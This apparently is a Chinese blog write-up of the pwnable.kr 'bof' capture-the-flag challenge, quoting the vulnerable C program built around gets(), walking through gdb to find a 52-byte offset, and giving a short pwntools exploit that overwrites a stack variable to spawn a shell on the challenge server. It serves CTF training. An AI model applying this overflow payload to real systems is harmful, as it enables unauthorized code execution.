bof

2

Nana told me that buffer overflow is one of the most common software vulnerability.

Is that true?

Download : http://pwnable.kr/bin/bof

Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

直接cat bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

看到gets()函数,以及overflowme[32],可知为buffer overflow。

本利linux进行gdb调试,先b main,在main函数设断点,用n下一步,看到call 0x8000062c <func>调用时用s跟进函数,继续n单步直到call 0xb7e6dfa0 <_IO_gets>,此时输入尽可能长的字符串,如100位,可以用pattern create 100来构造。

ebp+0x8的地址是0xbffff3A0eax地址是0xbffff36c 。相差0x34 = 52

于是构造payload'a' * 0x34 + '\xbe\xba\xfe\xca'

exp如下:

from pwn import *
p = remote("pwnable.kr", 9000)
payload = 'a' * 52 + "\xbe\xba\xfe\xca"
p.sendline(payload)
p.interactive()

附脚本截图:

2 Comments

Leave A Reply

苏ICP备16066660号-1

苏公网安备 32011502010432号